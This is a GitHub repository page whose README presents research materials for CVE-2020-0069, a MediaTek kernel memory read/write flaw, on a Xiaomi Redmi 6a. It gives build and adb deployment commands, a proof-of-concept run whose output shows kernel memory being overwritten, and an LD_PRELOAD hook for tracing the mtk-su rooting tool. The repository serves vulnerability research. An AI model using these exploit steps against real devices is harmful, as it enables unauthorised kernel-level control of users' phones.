Skip to content
No description, website, or topics provided.
C C++ Shell Makefile
Branch: master
Clone or download

Latest commit

Latest commit 036c8c3 Mar 24, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
jni Initial commit Mar 24, 2020
LICENSE Initial commit Mar 24, 2020
README.md Initial commit Mar 24, 2020
poc.sh Initial commit Mar 24, 2020

README.md

Description

This repository contains the materials we used to investigate CVE-2020-0069 on a Xiaomi Redmi 6a (with a Mediatek SoC MT6762M).

There are three programs:

  • kernel_rw.c a C program allowing to read/write kernel memory
  • poc.sh a shell script
  • syscall_hook.c a C library that can be used to trace the program mtk-su (tested on version 19)

Build

To build the binaries:

$ ndk-build

Then push them on the device:

$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp

Usage

CVE-2020-0069 PoC

$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

To trace mtk-su

$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
You can’t perform that action at this time.